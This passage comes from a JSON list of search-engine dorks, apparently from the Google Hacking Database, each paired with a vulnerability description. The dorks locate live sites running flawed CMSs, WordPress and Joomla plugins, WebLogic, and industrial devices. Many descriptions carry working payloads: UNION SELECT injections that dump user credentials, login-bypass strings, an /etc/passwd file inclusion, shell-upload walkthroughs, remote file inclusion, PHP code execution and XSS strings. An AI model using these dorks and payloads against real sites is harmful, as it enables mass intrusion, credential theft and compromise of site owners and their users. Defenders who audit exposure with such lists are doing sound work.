1.5.30 Remote Reset Admin Pass / Command Exec Exploit - CVE: 2007-0261: https://www.exploit-db.com/exploits/3116"}, {"dork": "inurl:\"printable_pedigree.php\"", "description": "Dog Pedigree Online Database 1.0.1b Blind SQL Injection: https://www.exploit-db.com/exploits/8740"}, {"dork": "\"powered by discuz!", "description": "Discuz! 4.x SQL Injection / Admin Credentials Disclosure: https://www.exploit-db.com/exploits/2859"}, {"dork": "\"This web site was made with PostNuke\"", "description": "PostNuke 0.763 (PNSV lang) Remote Code Execution - CVE: 2006-5733: https://www.exploit-db.com/exploits/2707"}, {"dork": "\"Powered by Shop-Script FREE\"", "description": "Shop-Script FREE 2.0 Remote Command Execution - CVE: 2007-4932: https://www.exploit-db.com/exploits/4419/"}, {"dork": "\"LinPHA Version 1.3.x\" or \"The LinPHA developers\"", "description": "LinPHA 1.3.1 (new_images.php) Remote Blind SQL Injection - CVE: 2007-4053: https://www.exploit-db.com/exploits/4242/"}, {"dork": "\"powered by Quick.Cart\"", "description": "Quick.Cart 2.0 (actions_client/gallery.php) Local File Include: \nhttps://www.exploit-db.com/exploits/2769"}, {"dork": "\"Powered by PHP-Update\" -site:www.php-update.co.uk", "description": "PHP-Update 2.7 Multiple Remote Vulnerabilities - CVE: 2006-6879: \nhttps://www.exploit-db.com/exploits/3017"}, {"dork": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "description": "phpMyChat 0.15.0dev (SYS enter) Remote Code Execution: \nhttps://www.exploit-db.com/exploits/1647"}, {"dork": "\"Powered by MercuryBoard\"", "description": "MercuryBoard 1.1.5 (login.php) Remote Blind SQL Injection - CVE: 2008-6632: \nhttps://www.exploit-db.com/exploits/5653"}, {"dork": "\"Powered by Coppermine Photo Gallery\"", "description": "Coppermine Photo Gallery 1.4.18 LFI / Remote Code Execution - CVE: 2008-3481: \nhttps://www.exploit-db.com/exploits/6178"}, {"dork": "\"Content managed by the Etomite Content Management System\"", "description": "Etomite CMS 0.6.1 (username) SQL Injection - CVE: 2006-3904: \nhttps://www.exploit-db.com/exploits/2071"}, {"dork": "\"powered by PCPIN.com\"", "description": "PCPIN Chat 5.0.4 (login/language) Remote Code Execution: \nhttps://www.exploit-db.com/exploits/1697"}, {"dork": "\"Powered by Leap\"", "description": "Leap CMS 0.1.4 (searchterm) Blind SQL Injection - CVE: 2009-1613: \nhttps://www.exploit-db.com/exploits/8576"}, {"dork": "inurl:\"option=com_tophotelmodule\"", "description": "CVE: 2009-3368\nEDB-ID:\nThis search potentially exposes Joomla Hotel Booking System XSS/SQL Injection Vulnerabilities"}, {"dork": "\"Runcms Copyright\" \"2002 - 2007\" +\"page created\"", "description": "RunCms 1.5.2 (debug_show.php) Remote SQL Injection - CVE: 2007-2539: \nhttps://www.exploit-db.com/exploits/3850"}, {"dork": "\"Powered by eXV2 Vers\"", "description": "exV2 2.0.4.3 extract() Remote Command Execution - CVE: 2006-7080: \nhttps://www.exploit-db.com/exploits/2415"}, {"dork": "\"Betrieben mit Serendipity 1.0.3\"", "description": "Serendipity 1.0.3 (comment.php) Local File Include - CVE: 2006-6242: \nhttps://www.exploit-db.com/exploits/2869"}, {"dork": "\"Powered by XMB\"", "description": "XMB 1.9.6 Final basename() Remote Command Execution - CVE: 2006-4191: \nhttps://www.exploit-db.com/exploits/2178"}, {"dork": "\"Powered by BIGACE 2.5\"", "description": "BIGACE CMS 2.5 (username) Remote SQL Injection - CVE: 2009-1778: \nhttps://www.exploit-db.com/exploits/8664"}, {"dork": "allintitle: powered by DeluxeBB", "description": "DeluxeBB 1.2 Multiple Remote Vulnerabilities - CVE: 2008-2195: \nhttps://www.exploit-db.com/exploits/5550"}, {"dork": "\"Powered by Online Grades\"", "description": "Online Grades & Attendance 3.2.6 Blind SQL Injection - CVE: 2009-2598: \nhttps://www.exploit-db.com/exploits/8854"}, {"dork": "\"Powered by ClanTiger\"", "description": "ClanTiger 1.1.1 (slug) Blind SQL Injection: https://www.exploit-db.com/exploits/8473"}, {"dork": "\"AlumniServer project\"", "description": "AlumniServer 1.0.1 (resetpwemail) Blind SQL Injection: https://www.exploit-db.com/exploits/9020"}, {"dork": "inurl:imageview5", "description": "Imageview 5 (Cookie/index.php) Remote Local Include - CVE: 2006-5554: \nhttps://www.exploit-db.com/exploits/2647"}, {"dork": "\"This site is powered by e107\"", "description": "TikiWiki 1.9 Sirius (jhot.php) Remote Command Execution - CVE: 2006-4602: \nhttps://www.exploit-db.com/exploits/2711"}, {"dork": "\"powered by tikiwiki\"", "description": "TikiWiki 1.9 Sirius (jhot.php) Remote Command Execution - CVE: 2006-4602: \nhttps://www.exploit-db.com/exploits/2288"}, {"dork": "\"powered by gcards\"", "description": "gCards 1.45 Multiple Vulnerabilities - CVE: 2006-1346: \nhttps://www.exploit-db.com/exploits/1595"}, {"dork": "pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid CSS\"", "description": "Pixelpost 1-5rc1-2 Remote Privilege Escalation Exploit - CVE: 2006-2889: \nhttps://www.exploit-db.com/exploits/1868"}, {"dork": "\"This web site was made with MD-Pro\"", "description": "CVE: 2006-7112\nEDB-ID: 2712\nThis search can potentially identify vulnerable installations of MD-Pro, a web portal system written in PHP."}, {"dork": "http://www.google.com/search?q=\"Powered+by+XMB\"", "description": "CVE: 2006-3994\nEDB-ID: 2105\nThis search can potentially identify vulnerable installations of XMB"}, {"dork": "\"powered by ThWboard\"", "description": "CVE: 2007-0340\nEDB-ID: 3124\nThis search can potentially identify vulnerable installations of ThWboard."}, {"dork": "\"Page created in\" \"seconds by glFusion\" +RSS", "description": "CVE: 2009-1281\nEDB-ID: 8347\nThis search can potentially identify vulnerable installations of glFusion.\nhttps://www.exploit-db.com/exploits/8347"}, {"dork": "inurl:wp-login.php Register Username Password -echo", "description": "CVE: 2006-2667\nEDB-ID: 6\nThis search can potentially identify vulnerable installations of WordPress."}, {"dork": "\"this site is using the webspell script (version: 4.01.02)\"", "description": "CVE: 2007-0502\nEDB-ID: 3172\nThis search can potentially identify vulnerable installations of webSPELL 4.01.02"}, {"dork": "inurl:\"com_sqlreport\"", "description": "Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability - CVE: 2010-0753: https://www.exploit-db.com/exploits/11549"}, {"dork": "\"Powered by Quick.Cart\"", "description": "Quick.Cart 2.2 RFI/LFI Remote Code Execution Exploit - CVE: 2007-3138: https://www.exploit-db.com/exploits/4025"}, {"dork": "\"Powered by Shadowed Portal\"", "description": "Shadowed Portal 5.7d3 Remote Command Execution Exploit: https://www.exploit-db.com/exploits/4768"}, {"dork": "\"powered by bitweaver\"", "description": "bitweaver 1.3 (tmpImagePath) Attachment mod_mime Exploit - CVE: 2006-3105: https://www.exploit-db.com/exploits/1918"}, {"dork": "inurl:\"index.php?ind=blog\"", "description": "MKPortal 1.2.1 Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/7796/"}, {"dork": "\"Site produced by GeneralProducts.co.uk\"", "description": "GeneralProducts (index.php?page=) Local File Inclusion Vulnerability\nhttp://server/index.php?page=../../../../../../etc/passwd\nNet.Edit0r - black.hat.tm@gmail.com"}, {"dork": "inurl:\"index.php?option=com_jeajaxeventcalendar\"", "description": "Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection Vulnerability Author: altbta"}, {"dork": "\"Powered by SiteEngine\"", "description": "SiteEngine 7.1 SQL injection Vulnerability: https://www.exploit-db.com/exploits/15612"}, {"dork": "inurl:\"index.php?option=com_competitions\"", "description": "SQL Injection: http://127.0.0.1/index.php?option=com_competitions&task=view&id=-9 union all select 1,2,3,4,group_concat(username,0x3a,email,0x3a,password),6,7 from jos_users-- and XSS: http://127.0.0.1/index.php?option=com_competitions&menu=XroGuE Author: Ashiyane Digital Security Team"}, {"dork": "inurl:\"index.php?option=com_storedirectory\"", "description": "SQL Injection Vulnerability: http://127.0.0.1/index.php?option=com_storedirectory&task=view&id=-16 UNION SELECT 1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_users \nAuthor: Ashiyane Digital Security Team"}, {"dork": "inurl:\"index.php?option=com_catalogue\"", "description": "Author: Ashiyane Digital Security Team SQL Injection: http://server/index.php?option=com_catalogue&Itemid=73&cat_id=-999 union select 1,version(),user(),4,5,6"}, {"dork": "inurl:index.php?option=com_doqment&cid=", "description": "Author: KedAns-Dz http://server/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--"}, {"dork": "inurl:\"index.php?option=com_annuaire\"", "description": "SQL Injection Vulnerability: \n[+] vuln: http://127.0.0.1/index.php?option=com_annuaire&view=annuaire&type=cat&id=[SQLi]\n[+] Exploit: /**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--\nSubmitter: Ashiyane Digital Security Team"}, {"dork": "\"Powered By Dejcom Market CMS\"", "description": "Submitter:Mormoroth PoC: http://server/showbrand.aspx?bc=%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge'))--"}, {"dork": "\"SOOP Portal 2.0\"", "description": "Submitted by: Net.Edit0r Shell Upload: https://www.exploit-db.com/exploits/15690"}, {"dork": "inurl:index.php?option=com_lqm \"showResults\"", "description": "Submitter: Snakespc SQL Injection: http://server/index.php?option=com_lqm&query=7&task=showResults&Itemid=158&lang=en&lqm_individual_id=-223+UNION SELECT 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12+from+cil_site.jos_us"}, {"dork": "PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification", "description": "intitle:PhpMyAdmin inurl:error.php"}, {"dork": "inurl:page.php?intPageID=", "description": "Submitter: Srblche SQL Injection: http://server/page.php?intPageID=[SQL]"}, {"dork": "inurl:com_amresurrected", "description": "Submitter: Bl4ck.Viper SQL Injection: index.php?option=com_amresurrected&Itemid=[Sqli]"}, {"dork": "inurl:panorama-viewer.php?id=", "description": "[-] http://server/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--\n[-] http://server/adm/users.php\n[-] http://server/adm/panorama_edit.php?id=1\n[-] http://server/listimages/shell.php\n \n#################################################################\n \nGreat 2 : : h4m1d /sheisebaboo / vc.emliter / Neo / H-SK33PY / Net.Editor / \nHUrr!c4nE / Cair3x /novin security team and all iranian hackers\n#################################################################"}, {"dork": "inurl:showcat.asp?id=", "description": "========================================\nCentralia (admin/dbedit.asp?) Bypass and Shell Upload Vulnerability\n========================================\n#################################################################\n# Exploit : Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability\n \n# Date : 10 December 2010\n \n# Author : ali.erroor\n \n# Version : n/a\n \n# Googel DorK : inurl:showcat.asp?id=\n \n# Home : www.network-security.ir\n \n# Email : ali.erroor@att.net\n \n#################################################################\n \n[+] Exploit\n \n[1] Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability..\n[-] http://localhost/path/admin/dbedit.asp?table=products\n \n[-] username : 'or''='\n[-] password : 'or''='\n[2] Create New Upload Your Shell.Asp ..\n[-] http://localhost/path/admin/dbedit.asp?a=upload_init\n \n[3] To See Shell Edit Your uploads\n[-] http://localhost/path/uploads/shell;asp.jpg\n \n[+] Demo\n[-] http://server/admin/dbedit.asp?table=products\n[-] http://server/admin/dbedit.asp?a=upload_init\n \n#################################################################\n \nGreat 2 : : h4m1d /sheisebaboo / vc.emliter / H-SK33PY / Net.Editor / HUrr!c4nE \n/ Cair3x /novin security team and all iranian hackers\n#################################################################"}, {"dork": "\"POWERED BY: WEBINSPIRE\"", "description": "Author: ghost-dz SQL Injection: http://server/pages.php?id=30+and+1=0+union+select+1,concat(id,0x3a,usr,0x3a,pwd,0x3a,email),3,4,5,6+from+utenti--"}, {"dork": "\"powered by simpleview CMS\"", "description": "Author: Sun Army XSS: /search/?searchString=\">alert(document.cookie)&submitSearch.x=17&submitSearch.y=13"}, {"dork": "\"Powered By PageAdmin CMS Free Version\"", "description": "Author: Sun Army XSS: /include/search.aspx?keycode=\">xss ByTakpar&type=1&language=en"}, {"dork": "intext: Copyright+MantisBT Group", "description": "Mantis Bug Tracker\nhttp://mantisbt.org\nhttps://www.exploit-db.com/exploits/15735/\nhttps://www.exploit-db.com/exploits/15736/\nThanks,*\nGjoko 'LiquidWorm' Krstic*\n*Information Security Engineer*\n***Zero Science Lab*\nMacedonian Information Security Research & Development Laboratory\nhttp://www.zeroscience.mk\n+389 (0) 75 290 926\n+389 (0) 77 670 886"}, {"dork": "\"Powered by: IRIran.net\"", "description": "IRIran eShop Builder SQL Injection: http://server/patch/pages/index.php?id=0[SQL] \nSubmitter: Ahoora"}, {"dork": "\"Powered by KaiBB 1.0.1\"", "description": "Multiple Vulnerabilities:https://www.exploit-db.com/exploits/15846/"}, {"dork": "inurl:\"/gadmin/index.php\"", "description": "Author: AtT4CKxT3rR0r1ST SQL Injection: www.site.com/gallery.php?id=null[Sql Injection]"}, {"dork": "inurl:\"com_eventcal\"", "description": "Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] RFI: www.site.com/components/com_eventcal/eventcal.php?mosConfig_absolute_path=[shell.txt?]"}, {"dork": "\"Powered by phpMySport\"", "description": "intext:\"Powered by phpMySport\" Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15921/"}, {"dork": "inurl:\"/modules.php?name=\" \"Maximus CMS\"", "description": "Maximus CMS (FCKeditor) File Upload Vulnerability\nhttps://www.exploit-db.com/exploits/15960\nAuthor: eidelweiss"}, {"dork": "\"inurl:cultbooking.php\"", "description": "CultBooking Multiple Vulnerabilities: https://www.exploit-db.com/exploits/16028/"}, {"dork": "intext:\"Powered by DZOIC Handshakes Professional\"", "description": "Author: IR-Security -Team\nSQL injection: http://server/administrator/index.php?section=manage_members&action=edit_photo&pho_id=-100001 union\nall select 1,version()--"}, {"dork": "inurl:\"/plugins/ImageManager/manager.php\"", "description": "Author: PenetraDz Shell Upload Vuln: manager/media/editor/plugins/ImageManager/manager.php"}, {"dork": "inurl:\"ab_fct.php?fct=\"", "description": "Multiple Vulnerabilities: https://www.exploit-db.com/exploits/16044"}, {"dork": "\"made visual by sightFACTORY\"", "description": "Author : eXeSoul [#] http://server/accommodations.php?contentid=[sqli] [#] http://server/chamber_business.php?mid=[sqli] [#] http://server/work.php?mid=[sqli] [#] http://server/members.php?id=[SQLi]"}, {"dork": "\"Powered by SOFTMAN\"", "description": "Author: eXeSoul\n[i] \"Powered by SOFTMAN\" \n[ii] \"Powered by Softman Multitech Pvt Ltd\"\n[iii] \"All Rights reserved by SOFTMAN\"\nGo To Admin Panel :-\nAdmin: ' or 'x'='x Password: ' or 'x'='x"}, {"dork": "intext:\"Web Design by Webz\" filetype:asp", "description": "Submitter: p0pc0rn \nhttp://site.com/xxx.asp?id=[SQL] \nhttp://site.com/xxx.asp?catID=[SQL] \nhttp://site.com/xxx.asp?brandID=[SQL]"}, {"dork": "inurl:\"sitegenius/topic.php\"", "description": "Submitter: dR.sqL SQL Injection: http://localhost/sitegenius/topic.php?id=[SQLi]"}, {"dork": "\"POWERED BY LOG1 CMS\"", "description": "Multiple Vulnerabilities: https://www.exploit-db.com/exploits/16969/"}, {"dork": "ADAN (view.php ) Sql Injection Vulnerability", "description": "SQL Injection: https://www.exploit-db.com/exploits/16276/"}, {"dork": "intext:\"Site by Triware Technologies Inc\"", "description": "Submitter: p0pc0rn \nSQL Injection: http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id] http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]"}, {"dork": "intext:\"Powered by VoiceCMS\"", "description": "Submitter: p0pc0rn SQL Injection: http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id] http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]"}, {"dork": "intext:\"Powered by OnePlug CMS\"", "description": "Sumitter: p0pc0rn \nSQL Injection: http://site.com/category_list.asp?Category_ID=1 union select 0 from test.a"}, {"dork": "intext:\"Powered by Inventory Mojo Software.\"", "description": "Submitter: p0pc0rn\nSQL Injection (categoria.asp, producto.asp, srubro.asp, marca.asp, buscar.asp, Login.asp, NewUser.asp, do_addToNewsletter.asp) \n---\nhttp://site.com/categoria.asp?CT=6' and '1'='1 TRUE http://site.com/categoria.asp?CT=6' and '1'='0 FALSE"}, {"dork": "\"site by Designscope\"", "description": "Submitter: Net.Edit0r \nSQL Injection: http://127.0.0.1/general.php?pageID=[SQL] http://127.0.0.1/content.php?pageID=[SQL]"}, {"dork": "index.php?option=com_ignitegallery", "description": "Submitter: TiGeR_YeMeN HaCkEr \nSQL Injection: index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--"}, {"dork": "intext:\"Powered by FXRecruiter\"", "description": "Submitter: Ashiyane Digital Security Team\nArbitrary File Upload: You must Register at site, Then in \"Upload CV Field\" Select and Upload Your File, then Using \"Live Http Header\" Change ur File Format To Etc Uploaded path: http://127.0.0.1/fxmodules/resumes/[Your File]"}, {"dork": "inurl:\"fbconnect_action=myhome\"", "description": "Submitter: z0mbyak \nSQL Injection: www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--"}, {"dork": "\"error_log\" inurl:/wp-content", "description": "Find various www readable Wordpress directories containing error logs with \r\n\r\nserver side debugging info, such as home path directory names, which are \r\n\r\noften the same user names for logging into the server over FTP and SSH.\r\n\r\n\r\n\r\nThis often exposes the path of the plug-ins installed in wordpress as well, \r\n\r\ngiving someone more information and avenues of attack since many Wordpress \r\n\r\nplug-ins can lead to compromises of the sites security. - DigiP"}, {"dork": "inurl:\"clsUploadtest.asp\"", "description": "Submitter: KDGCrew\nhttp://www.site.com/clsUpload/clsUploadtest.asp\nhttp://www.site.com/clsUpload/nameshell.php"}, {"dork": "\"Powered by SLAED CMS\"", "description": "Exploit Title: Slaed CMS Code exec\nOn different versions of this software next vulnerabilities are availible:\n/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view\n/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view\nOR:\n/search.html?mod=&word={${phpinfo()}}&query=ok&to=view\n/search.html?mod=&word=ok&query={${phpinfo()}}&to=view"}, {"dork": "intitle:\"pChart 2.x - examples\" intext:\"2.1.3\"", "description": "The web application is vulnerable to Directory Traversal and XSS.\nThe version number can be omitted, all prior versions prior than 2.1.4\nare vulnerable.\nAdvisories and Vulnerabilities\nhttps://www.exploit-db.com/exploits/31173/\nhttp://www.pchart.net/advisory"}, {"dork": "inurl:fckeditor -intext:\"ConfigIsEnabled = False\" intext:ConfigIsEnabled", "description": "inurl:fckeditor -intext:\"ConfigIsEnabled = False\" intext:ConfigIsEnabled\nSearches for fckeditor default url and which has a config.asp file where configisenabled = true. Unable to search for true value directly because file contains 'example' which could lead to false positive. If found, traversing two directories up to /connectors/ should present an uploadtest.html file.\nThis may be old, though the existing DORKS didn't call it out specifically, and google still gives a lot of hits."}, {"dork": "inurl:/wp-admin/admin-ajax.php?action=revslider_ajax_action", "description": "This dork finds vulnerabel revslider plugins.\nIn reference to the exploit submitted by Adri\u00e1n M. F.\nhttps://www.exploit-db.com/exploits/37067/\nAuthor:NickiK."}, {"dork": "inurl:/wp-admin/post.php?post=", "description": "This dork finds websites which could be exploitable using Adri\u00e1n M. F.\nlanding page exploit - https://www.exploit-db.com/exploits/37108/\nAuthor:NickiK."}, {"dork": "inurl:courier/web/ inurl:wmLogin.html filetype:html", "description": "Identifies Accellion Secure File Transfer servers that may be vulnerable to\nhttps://community.rapid7.com/community/metasploit/blog/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857\n@lanmaster53"}, {"dork": "inurl:EndUserPortal.jsp", "description": "inurl:EndUserPortal.jsp \nIt takes you it brings up login pages for the service desk. \nhttps://www.exploit-db.com/exploits/37667/\nAuthor: NumLock90"}, {"dork": "inurl:\"index.php\" intext:\"ApPHP Hotel Site\" -site:\"apphp.com\"", "description": "Dork Identifies the sites with ApPHP-Hotel-Site 3.x.x vulnerable to sql\ninjection.\nhttps://packetstormsecurity.com/files/132369/ApPHP-Hotel-Site-3.x.x-SQL-Injection.html\nRegards,\nKaran Ramani"}, {"dork": "inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/", "description": "www.exploit-db.com/exploits/37275/\nDork: inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/\nsincerely,\nZeel Chavda"}, {"dork": "inurl:/wp-content/plugins/inboundio-marketing/", "description": "https://www.exploit-db.com/exploits/36478/\nGoogle Dork : inurl:/wp-content/plugins/inboundio-marketing/\nsincerely,\nZeel Chavda"}, {"dork": "allinurl:wp-content/plugins/wptf-image-gallery/", "description": "Description:- Aribtrary File Download Vuln.\nExploit :- www.exploit-db.com/exploits/37751/\nGoogle :- allinurl:wp-content/plugins/wptf-image-gallery/\nSincerely,\nZeel Chavda"}, {"dork": "\"ganglia mobile.php\"", "description": "EDB: https://www.exploit-db.com/exploits/38030/\nCVE: CVE-2012-3448\nAlso:\nintitle:\"Ganglia Mobile\"\nintitle:\"Ganglia\" inurl:\"mobile.php\"\nintitle:\"Grid Report\" OR intitle:\"Cluster Report\" OR intitle:\"Node View\" OR intitle:\"Host Report\" OR intitle:\"Ganglia:: \"\nintitle:\"Powered by Job Monarch\"\nintext:\"Job Monarch version \"\nintext:\"Jobarchive\" intext:\"runningtime\"\ninurl:\"/addons/job_monarch\" -oss.trac.surfsara.nl\n\"Ganglia Web Frontend version 3.5.0\" - Comment: just tweak the version 3.5.0 to any valid Ganglia Web Frontend version to get results targeted to a specific version."}, {"dork": "inurl:cgi-bin/webproc?getpage=", "description": "inurl:cgi-bin/webproc?getpage=\nhttps://www.exploit-db.com/exploits/38488/\nBy JeJe Plus"}, {"dork": "\"powered by joomla 3.2\" OR \"powered by joomla 3.3\" OR \"powered by joomla 3.4\"", "description": "Search for all websites built on specific versions of Joomla CMS . These\nspecific versions of Joomla could potentially be vulnerable\nto the SQL injection attack (CVE-2015-7297) .\nThanks\nDheeraj"}, {"dork": "intitle:\"Dashboard [Jenkins]\" Credentials", "description": "Find Jenkins websites which do not require authentication to possibly\nretrieve credentials and obtain remote command execution.\nVulnerability: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html\n- Th3R3p0"}, {"dork": "inurl:/node/add/event", "description": "Dorks For Drupal HTML& Arbitrary File Upload Vulnerabilities\ninurl:/node/add/event\ninurl:/node/add/announcement\nThis Dork Original By Mr.XSecr3t :p\nNO COPAS brooh :v\n~GAME OVER~"}, {"dork": "inurl:\".asp?strParents=\"", "description": "Author: Charley Celice (@charleycelice)\n99% of sites I found using this dork are vulnerable to XSS attacks. The\n\"strParents\" parameter seems to always be injectable.\nExample:\nhttps://example/whatever.asp?strParents=\n\"/>&CAT_ID=1337&whatever=1337&etc...\n-stmerry"}, {"dork": "inurl:\"/webmail/\" intitle:\"Mail - AfterLogic WebMail\" -site:afterlogic.org -site:afterlogic.com", "description": "inurl:\"/webmail/\" intitle:\"Mail - AfterLogic WebMail\" -site:afterlogic.org -site:afterlogic.com\nAfterLogic WebMail\nXXE Injection Vulnerability\nhttps://www.exploit-db.com/exploits/39850/\nDecoy"}, {"dork": "ext:php inurl:\"api.php?action=\"", "description": "ext:php inurl:\"api.php?action=\"\nXenAPI/XenForo SQLi Vulnerability\nhttps://www.exploit-db.com/exploits/39849/"}, {"dork": "intext:\"Forum software by XenForo\u2122\"", "description": "intext:\"Forum software by XenForo\u2122\"\nXenForo SQLi Vulnerability. - https://www.exploit-db.com/exploits/39849/\n\"value\" parameter unsanitized."}, {"dork": "inurl:\"/wp-content/plugins/wp-mobile-detector/\" ext:php", "description": "WP Mobile Detector 3.5 Remote Shell Upload\nhttps://www.exploit-db.com/exploits/39891/\ninurl:\"/wp-content/plugins/wp-mobile-detector/\" ext:php\nDecoy"}, {"dork": "inurl:\"/wp-content/uploads/levoslideshow/\"", "description": "Webshell Upload.\nWordpress Levo-Slideshow 2.3\ninurl:\"/wp-content/uploads/levoslideshow/\"\nDecoy"}, {"dork": "intext:\"Hello visitor from\" ext:asp", "description": "intext:\"Hello visitor from\" ext:asp\natawho - sonadam - antidote\ndetails\nhttps://monodram.net/2015/10/10/user-agent-xss-inj.html"}, {"dork": "\"index of\" bigdump.php", "description": "Search for BigDump: Staggered MySQL Dump Importer file\n- Arbitrary Upload\n- Juicy info/passwords\n- Deleting files\n- MySQL injection"}, {"dork": "inurl:sgms/auth", "description": "inurl:sgms/auth\nThis will allow you to find Sonicwall GMS servers.\nThis article mentions 6 vulnerabilities recently found.\nhttps://www.digitaldefense.com/vrt-discoveries/"}, {"dork": "inurl:/index.php?option=com_artforms", "description": "# Exploit Title : ----------- :Joomla \"com_artforms\" component SQL Injection\n# Author : ----------------- : importantTR\n# Google Dork : --------- : -inurl:/index.php?option=com_artforms\n# Date : -------------------- : 20/01/2017\n# Platform : --------------- : Joomla\n ########## 1-SQL Injection ##########\nindex.php?option=com_artforms&task=ferforms&viewform=[SQLi]\n##### SQLi Parameter :\n/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x4a,username,password%29,3,4,5,6%20from%20jos_users%23\n########## AYYILDIZ TIM ##########\nhttps://www.exploit-db.com/exploits/14263/"}, {"dork": "inurl:sendmessage.php?type=skype", "description": "Dork to find Joomla JMS Support Online Module Reflected XSS (skype module)\nType: Reflected XSS\nVulnerable URL:http://localhost/[PATH]/sendmessage.php\nVulnerable Parameters: ?type=skype&user=&skype=\nMethod: GET\nPayload: \">"}, {"dork": "\"CF-Host-Origin-IP\" \"CF-Int-Brand-ID\" \"CF-RAY\" \"CF-Visitor\" \"github\" -site:github.com -site:cloudfare.com", "description": "Dork:\n\"CF-Host-Origin-IP\" \"CF-Int-Brand-ID\" \"CF-RAY\" \"CF-Visitor\" \"github\"\n-site:github.com -site:cloudfare.com\nReplace \"github.com\" with any of the other Cloudfare servers as can be\nfound here.\nhttps://github.com/pirate/sites-using-cloudflare\nLook at cached results for data leaked from memory due to \"Cloudbleed\"\nvulnerability.\nhttps://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/"}, {"dork": "inurl:\"/admin/index.php?msg=\" inurl:\"%20\"", "description": "Finds pages that can be XSS'd and edited\r\n\r\n\r\n\r\ne.g.: http://www.site.com/admin/index.php?msg=Click me!\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "inurl:\"exit.php?site=\"", "description": "Finds files that let you redirect users to any site!\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "inurl:\"/testssi.ssi\"", "description": "*Google dork description: *Xitami servers distributed with a script for\r\ntesting server-side includes, '/testssi.ssi'. This script is vulnerable to\r\na cross-site scripting issue when sent a request with a malformed Host or\r\nUser-Agent header. An attacker may exploit this flaw the steal the\r\nauthentication credentials of third-party users.\r\n\r\n*Google Search: *inurl:\"/testssi.ssi\"\r\n\r\n*Submitted by:* Alfie_the-infosec_"}, {"dork": "inurl:\"mgl-instagram-gallery/single-gallery.php?media\"", "description": "This Dork, helps us find websites, which contain the mgl-instagram-gallery plugin of WordPress Vulnerable to XSS\r\n\r\ninurl:\"mgl-instagram-gallery/single-gallery.php?media\"\r\n\r\nDrok3r"}, {"dork": "intitle:\"Nport web console\"", "description": "Vulnerable moxa devices can be identified with the following dork\r\n\r\nintitle:\"Nport web console\"\r\n\r\nreference:https://ics-cert.us-cert.gov/advisories/ICSA-17-355-01"}, {"dork": "intitle:\"WAGO Ethernet web-based-management\"", "description": "Vulnerable Wago devices can be identified with the following dork\r\n\r\nintitle:\"WAGO Ethernet web-based-management\"\r\n\r\nReference: https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-341-01\r\n\r\nThanks,\r\n\r\nMudassar"}, {"dork": "\"Powered by 2Moons\"", "description": "Find websites using 2Moons ogame software.\r\n\r\nhttps://www.exploit-db.com/exploits/37713/"}, {"dork": "inurl:\"/uddiexplorer/searchpublicregistries.jsp\"", "description": "Category: Page containing log in portal & Web Server Detection\r\n\r\nDescription: This dork allows user to access default page of Oracle\r\nWeblogic Server - UDDI Explorer. Some of scanner tools would detect SSRF\r\nvulnerability for weblogic uddi explorer. Moreover, there is a flaw\r\nregarding the weblogic server version which vulnerables to XSS.\r\n\r\nReference:\r\nhttps://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html\r\n\r\nAuthor: Zulfikar Azhari"}, {"dork": "inurl=\"/uddiexplorer/SetupUDDIExplorer.jsp\"", "description": "Category: Page containing log in portal & Web Server Detection\r\n\r\nDescription: This dork allows user to access default page of Oracle Weblogic Server - UDDI Explorer. Some of scanner tools would detect SSRF vulnerability for weblogic uddi explorer. Moreover, there is a flaw regarding the weblogic server version which vulnerables to XSS.\r\n\r\nReference: https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html\r\n\r\nAuthor: Zulfikar Azhari"}, {"dork": "inurl:wls-wsat intext:\"weblogic.wsee.wstx.wsat\"", "description": "Finds weblogic wl-wsat services endpoints prone to XML deserialization\r\nRemote Command Execution - CVE-2017-10271\r\n\r\nDork: inurl:wls-wsat intext:\"weblogic.wsee.wstx.wsat\"\r\n\r\nCheers. Sh3llb0y"}, {"dork": "site:www.openbugbounty.org + intext:\"Open Redirect\" + intext:\"Unpatched\"", "description": "Dork : 